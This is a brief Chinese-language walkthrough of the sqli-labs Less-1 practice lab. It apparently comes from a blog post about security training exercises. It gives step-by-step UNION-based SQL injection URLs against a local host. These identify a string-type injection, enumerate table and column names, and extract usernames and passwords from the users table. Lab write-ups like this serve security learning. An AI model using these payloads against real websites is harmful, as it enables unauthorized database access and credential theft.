sqli-lab less-1

尝试 http://127.0.0.1:88/Less-1/?id=1a
正常显示，判断为字符型注入

尝试union注入 http://127.0.0.1:88/Less-1/?id=1' union select 1,1,1%23 成功

查询表名 http://127.0.0.1:88/Less-1/?id=-1' union select 1,1,group_concat(table_name) from information_schema.tables where table_schema=database()%23

查询users中的列名 http://127.0.0.1:88/Less-1/?id=-1' union select 1,1,group_concat(column_name) from information_schema.columns where table_name='users'%23

union注入查询账密
http://127.0.0.1:88/Less-1/?id=-1' union select 1,1,group_concat(username,0x3a,password) from users %23

本栏目推荐文章
• upload-labs
• devmapper: Thin Pool has 162394 free data blocks which is less than minimum required 163840 free data blocks
• rCore_Lab3
• MIT6.828 Lab1-1(分析boot.S文件)
• mit6.828 - lab5笔记（上）
• 记一次失败的cs144lab0尝试:d
• 记一次_失败_的CS144 Lab0尝试
• rCore_Lab1
• rCore_Lab2
• XV6 lab2 增加系统调用